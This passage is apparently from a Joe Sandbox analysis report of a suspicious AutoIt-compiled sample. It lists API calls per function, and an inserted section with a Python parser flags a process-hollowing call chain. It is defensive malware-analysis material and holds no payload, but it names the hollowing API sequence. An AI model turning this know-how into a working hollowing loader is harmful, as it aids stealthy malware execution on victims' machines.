                                                  • API String ID: 1438897964-0
                                                  • Opcode ID: b0201e3e51ed09b6fda58b761f735eaf3ba24d182a5a60108f00e33fefc0a5e6
                                                  • Instruction ID: 3479c7c82652631f446da3af78be065423e413d3580da0443a8ad1ef6738b79c
                                                  • Opcode Fuzzy Hash: b0201e3e51ed09b6fda58b761f735eaf3ba24d182a5a60108f00e33fefc0a5e6
                                                  • Instruction Fuzzy Hash: 4F1167719083119BC700EF69E845A0EBBE8FB98710F00451EF089873A1DBB0D659DBA6
                                                  APIs
                                                    • Part of subcall function 00C6594C: __FF_MSGBANNER.LIBCMT ref: 00C65963
                                                    • Part of subcall function 00C6594C: __NMSG_WRITE.LIBCMT ref: 00C6596A
                                                    • Part of subcall function 00C6594C: RtlAllocateHeap.NTDLL(01790000,00000000,00000001,00000000,?,?,?,00C61013,?), ref: 00C6598F
                                                  • std::exception::exception.LIBCMT ref: 00C6102C
                                                  • __CxxThrowException@8.LIBCMT ref: 00C61041
                                                    • Part of subcall function 00C687DB: RaiseException.KERNEL32(?,?,?,00CFBAF8,00000000,?,?,?,?,00C61046,?,00CFBAF8,?,00000001), ref: 00C68830
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 3902256705-0
                                                  • Opcode ID: 35f8803e7ddd8da1c600ba2ae574ad9917ccf3f25575f251a9f145aa863833d4
                                                  • Instruction ID: 34394abc0b04924e539d0b6a4c23033fe05db4e84a330618af32f92773c48e8e
                                                  • Opcode Fuzzy Hash: 35f8803e7ddd8da1c600ba2ae574ad9917ccf3f25575f251a9f145aa863833d4
                                                  • Instruction Fuzzy Hash: E1F0F47450020DA6CF30AA98EC829DF77A89F00351F280026FD04A2281EFB08B84E2E1
                                                  APIs
                                                    • Part of subcall function 00C68D68: __getptd_noexit.LIBCMT ref: 00C68D68
                                                  • __lock_file.LIBCMT ref: 00C6561B
                                                    • Part of subcall function 00C66E4E: __lock.LIBCMT ref: 00C66E71
                                                  • __fclose_nolock.LIBCMT ref: 00C65626
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                  • String ID:
                                                  • API String ID: 2800547568-0
                                                  • Opcode ID: 0224ce2e2d22e0b88d114fd52794df8c83ed306af5e5ebf840766649bba7eddc
                                                  • Instruction ID: b96761dbb707a29c34477ff441b98e6c496995292abb91d5163dd166aab31182
                                                  • Opcode Fuzzy Hash: 0224ce2e2d22e0b88d114fd52794df8c83ed306af5e5ebf840766649bba7eddc
                                                  • Instruction Fuzzy Hash: F8F09AB1800A059ADB30AB79C88276E6AA16F41334F658209B425AB2C1CF7C8A45EB56
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 01781A5B
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01781AF1
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01781B13
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                  • Instruction ID: e76dd18517f145b899fc447d0b049f74bcd650bfff9246cf6cef8e4514b05008
                                                  • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                  • Instruction Fuzzy Hash: B412BD24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CB5A
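The function block above (CreateProcessW, then Wow64GetThreadContext, then a 4-byte ReadProcessMemory, all in the region at 01780000 that the report marks "based on PE: false") is the opening of the classic 32-bit process-hollowing chain that the report's signatures ("Modifies the context of a thread in another process", "Writes to foreign memory regions") describe. The following is an added example, not code from Joe Sandbox or from the sample: a small parser that reads function blocks in this report's own line format (constructed sample input copied from the listing is embedded) and scores each block for the hollowing API chain. The stage names, the `assess` verdict strings, and the reading of the 4-byte ReadProcessMemory as a PEB->ImageBaseAddress fetch are this example's own assumptions and inferences, not facts stated by the report.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: three function blocks copied from the report's own
# listing (the 01780000 region is "based on PE: false", i.e. code that is not
# backed by the on-disk image), trimmed to the lines this parser reads.
SAMPLE_BLOCKS = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 01781A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01781AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01781B13
Memory Dump Source
• Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
APIs
• Sleep.KERNELBASE(000001F4), ref: 017822B1
Memory Dump Source
• Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
APIs
• IsThemeActive.UXTHEME ref: 00C44992
  • Part of subcall function 00C43B4C: IsDebuggerPresent.KERNEL32 ref: 00C43B8C
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C449D2
Memory Dump Source
• Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
"""

# A direct API reference line, e.g.
#   • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01781B13
# The argument list and the comma before "ref:" are optional (see IsThemeActive).
API_RE = re.compile(
    r"^•\s*(?P<api>[A-Za-z_][\w@]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# The "Memory Dump Source" line carries the region base and whether it is image-backed.
SRC_RE = re.compile(r"Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")

# Hollowing stages (assumed grouping for this example), keyed by the APIs that mark them.
STAGES = {
    "create": {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "context": {"GetThreadContext", "Wow64GetThreadContext"},
    "memory": {"ReadProcessMemory", "WriteProcessMemory", "VirtualAllocEx", "NtUnmapViewOfSection"},
    "set_context": {"SetThreadContext", "Wow64SetThreadContext"},
    "resume": {"ResumeThread", "NtResumeThread"},
}


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str


@dataclass
class FuncBlock:
    calls: list = field(default_factory=list)
    offset: str = ""
    pe_backed: bool = True  # the report's "based on PE" field


def parse_blocks(text):
    """Split report text into function blocks; keep only direct API references."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FuncBlock()
            blocks.append(cur)
            continue
        if cur is None or "Part of subcall" in line:  # indirect refs are not this function's calls
            continue
        m = API_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref").upper()))
            continue
        m = SRC_RE.search(line)
        if m:
            cur.offset = m.group("off").upper()
            cur.pe_backed = m.group("pe") == "true"
    return blocks


def stages_present(block):
    apis = {c.api for c in block.calls}
    return {name for name, members in STAGES.items() if apis & members}


def _four_byte_read_after_context(block):
    # nSize is ReadProcessMemory's 4th parameter; a 4-byte read right after the
    # thread-context read has the shape of fetching PEB->ImageBaseAddress through
    # CONTEXT.Ebx in a 32-bit hollowing loader (inference, not proven by the listing).
    seen_ctx = False
    for c in block.calls:  # the report lists calls in address order
        if c.api in STAGES["context"]:
            seen_ctx = True
        elif seen_ctx and c.api == "ReadProcessMemory" and len(c.args) >= 4 and c.args[3] == "00000004":
            return True
    return False


def assess(block):
    """Return a verdict for one function block plus the evidence behind it."""
    st = stages_present(block)
    reasons = []
    if {"create", "context", "memory"} <= st:
        verdict = "process-hollowing-prologue"
        reasons.append("CreateProcess, GetThreadContext and cross-process memory access in one function")
    elif "memory" in st and ({"set_context", "resume"} & st):
        verdict = "process-hollowing-epilogue"
        reasons.append("cross-process write followed by SetThreadContext/ResumeThread")
    else:
        verdict = "inconclusive"
    if not block.pe_backed:
        reasons.append(f"code at {block.offset} is not backed by the PE image (based on PE: false)")
    if _four_byte_read_after_context(block):
        reasons.append("4-byte ReadProcessMemory after the thread-context read")
    return {"verdict": verdict, "stages": sorted(st), "reasons": reasons}


if __name__ == "__main__":
    for b in parse_blocks(SAMPLE_BLOCKS):
        print(b.offset, assess(b))
```

The parser ignores "Part of subcall function" lines on purpose: those are callees, and the AutoIt runtime's own startup (IsDebuggerPresent, GetCurrentDirectoryW) shows up there in every compiled script, so counting them would flag the interpreter rather than the payload. The unbacked-region flag is what separates the 01780000 blocks from the C40000 image: the same three APIs inside an image-backed region still deserve a look, but the same chain in memory the loader mapped itself is the hollowing pattern.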
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 28d549a878bb40a0cb5b4dd8be2a37b02d597869621ea4000993c7ff71b68c58
                                                  • Instruction ID: fdeba9e38db3c9c6da7219c2451ad18290d3519b2467366e737eb9a3aaba9bad
                                                  • Opcode Fuzzy Hash: 28d549a878bb40a0cb5b4dd8be2a37b02d597869621ea4000993c7ff71b68c58
                                                  • Instruction Fuzzy Hash: 0F411774508351DFDB24DF14C484B1ABBE1BF45318F1988ACE8A98B762C332EC99CB56
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: d6c34f1ff5a4183727190edbcd4833ad14e59be6d6a0f806736ee8a56d2e8aee
                                                  • Instruction ID: f6d45349c2f83eaea2ceaebb8a5e332e7719133e3439a593d14b175e1f0e0d15
                                                  • Opcode Fuzzy Hash: d6c34f1ff5a4183727190edbcd4833ad14e59be6d6a0f806736ee8a56d2e8aee
                                                  • Instruction Fuzzy Hash: A6210D71A08609EBDB208F25EC8277D7BB8FF10390F21C56EE48AC5191EB3095E1E742
                                                  APIs
                                                    • Part of subcall function 00C44D13: FreeLibrary.KERNEL32(00000000,?), ref: 00C44D4D
                                                    • Part of subcall function 00C6548B: __wfsopen.LIBCMT ref: 00C65496
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00D062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C44F6F
                                                    • Part of subcall function 00C44CC8: FreeLibrary.KERNEL32(00000000), ref: 00C44D02
                                                    • Part of subcall function 00C44DD0: _memmove.LIBCMT ref: 00C44E1A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                  • String ID:
                                                  • API String ID: 1396898556-0
                                                  • Opcode ID: 45de58af25240488fe8b2116cb34f5109ec7ea91a207cf00e2b3525e1c849a02
                                                  • Instruction ID: d8f56b5b648e3392ea007fe09bc489ee119e8b79d07c30ced1565ae258f6f6bb
                                                  • Opcode Fuzzy Hash: 45de58af25240488fe8b2116cb34f5109ec7ea91a207cf00e2b3525e1c849a02
                                                  • Instruction Fuzzy Hash: 3011A731600605ABDB28AFB4DC52FAE77A5AF44711F20842DF942A61C1DE719A15A760
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: a1eb505e7f72c10d152929e71339eb874656265f9a3cd25907590fc8e44e04b0
                                                  • Instruction ID: 4fa906f0baf2373e1bf834525c858be66970e0c6729e6e81291b415bb4b0a43e
                                                  • Opcode Fuzzy Hash: a1eb505e7f72c10d152929e71339eb874656265f9a3cd25907590fc8e44e04b0
                                                  • Instruction Fuzzy Hash: 46210FB4508341DFCB24DF14C484B1ABBE1BF88304F09896CE8AA47761D731E859DB92
                                                  APIs
                                                  • __lock_file.LIBCMT ref: 00C64AD6
                                                    • Part of subcall function 00C68D68: __getptd_noexit.LIBCMT ref: 00C68D68
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit__lock_file
                                                  • String ID:
                                                  • API String ID: 2597487223-0
                                                  • Opcode ID: 434ea9daee5004ff4aeb54f9304a7290c5fc445cf1442778e9baff1e28651bbf
                                                  • Instruction ID: d790f05f151b70e7356ffad1951a4c1429c03f929887f4ab01d71ce1dca9e00f
                                                  • Opcode Fuzzy Hash: 434ea9daee5004ff4aeb54f9304a7290c5fc445cf1442778e9baff1e28651bbf
                                                  • Instruction Fuzzy Hash: 32F0C231980209ABDF75AFB4CC863AF36A1AF00725F088614F424AA1D2CB788A50FF55
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,?,00D062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C44FDE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: f173a167273ec7ba25498b43962dacf4b69cb7326d81ab5364a6bb64af4be698
                                                  • Instruction ID: c89d53301dabdd4cae045deabc2fc7c1c590f601e88ec4d6cc197764af7eff70
                                                  • Opcode Fuzzy Hash: f173a167273ec7ba25498b43962dacf4b69cb7326d81ab5364a6bb64af4be698
                                                  • Instruction Fuzzy Hash: 14F06DB1105712CFEB389FA5E494A16BBF1BF043293348A3EE5E782610C731A948DF40
                                                  APIs
                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C609F4
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: LongNamePath_memmove
                                                  • String ID:
                                                  • API String ID: 2514874351-0
                                                  • Opcode ID: e0f3be73229a3528bb38c6e3f2e6e31e5ff03c1df1d8ef2ffb97b1612fcd1c62
                                                  • Instruction ID: 6850cdc0bd06bc2699a272fcb59a522e22b0308149625d5dd93af12d853f991c
                                                  • Opcode Fuzzy Hash: e0f3be73229a3528bb38c6e3f2e6e31e5ff03c1df1d8ef2ffb97b1612fcd1c62
                                                  • Instruction Fuzzy Hash: 5EE0CD76D0422857C720D65CDC05FFA77EDDF88790F0441B5FC0CD7204D9609C828690
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __wfsopen
                                                  • String ID:
                                                  • API String ID: 197181222-0
                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction ID: adf0fd326d71ee230ce21de719c43965038113bbece0ba60849ddfd4c5b29df2
                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction Fuzzy Hash: 8CB0927A84020C77DE112E82EC02A693B199B40678F808060FB0C28162AA73A6A0A689
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction ID: c91437eb83454f41d79057c7b906a8c09559993e6ef34e74a02ab68947f529f7
                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction Fuzzy Hash: 3A31D370A00115DBC728DF99C4C096AF7A6FF59300B748AA5E45AEB651D732EEC1CB80
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 017822B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction ID: de1e38727b0a5f4d3fcf6cf7b4c5300b70827099860c03128faa797115220065
                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction Fuzzy Hash: F9E0E67498410EDFDB00EFB4D54969E7FB4EF04312F100161FD01D2281D6309D50CA72
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00CCCE50
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CCCE91
                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00CCCED6
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CCCF00
                                                  • SendMessageW.USER32 ref: 00CCCF29
                                                  • _wcsncpy.LIBCMT ref: 00CCCFA1
                                                  • GetKeyState.USER32(00000011), ref: 00CCCFC2
                                                  • GetKeyState.USER32(00000009), ref: 00CCCFCF
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CCCFE5
                                                  • GetKeyState.USER32(00000010), ref: 00CCCFEF
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CCD018
                                                  • SendMessageW.USER32 ref: 00CCD03F
                                                  • SendMessageW.USER32(?,00001030,?,00CCB602), ref: 00CCD145
                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00CCD15B
                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00CCD16E
                                                  • SetCapture.USER32(?), ref: 00CCD177
                                                  • ClientToScreen.USER32(?,?), ref: 00CCD1DC
                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00CCD1E9
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CCD203
                                                  • ReleaseCapture.USER32 ref: 00CCD20E
                                                  • GetCursorPos.USER32(?), ref: 00CCD248
                                                  • ScreenToClient.USER32(?,?), ref: 00CCD255
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CCD2B1
                                                  • SendMessageW.USER32 ref: 00CCD2DF
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CCD31C
                                                  • SendMessageW.USER32 ref: 00CCD34B
                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CCD36C
                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CCD37B
                                                  • GetCursorPos.USER32(?), ref: 00CCD39B
                                                  • ScreenToClient.USER32(?,?), ref: 00CCD3A8
                                                  • GetParent.USER32(?), ref: 00CCD3C8
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CCD431
                                                  • SendMessageW.USER32 ref: 00CCD462
                                                  • ClientToScreen.USER32(?,?), ref: 00CCD4C0
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CCD4F0
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CCD51A
                                                  • SendMessageW.USER32 ref: 00CCD53D
                                                  • ClientToScreen.USER32(?,?), ref: 00CCD58F
                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CCD5C3
                                                    • Part of subcall function 00C425DB: GetWindowLongW.USER32(?,000000EB), ref: 00C425EC
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00CCD65F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                  • String ID: @GUI_DRAGID$F
                                                  • API String ID: 3977979337-4164748364
                                                  • Opcode ID: 4452e55a8b685f6b8da864ff930c344d93f1ef39176dc4d0e8b3438b7e5ea24e
                                                  • Instruction ID: 43c777007f32de7aa7dae4bd82729b12ca2440aabbdaba798ec864a84f0cb3ca
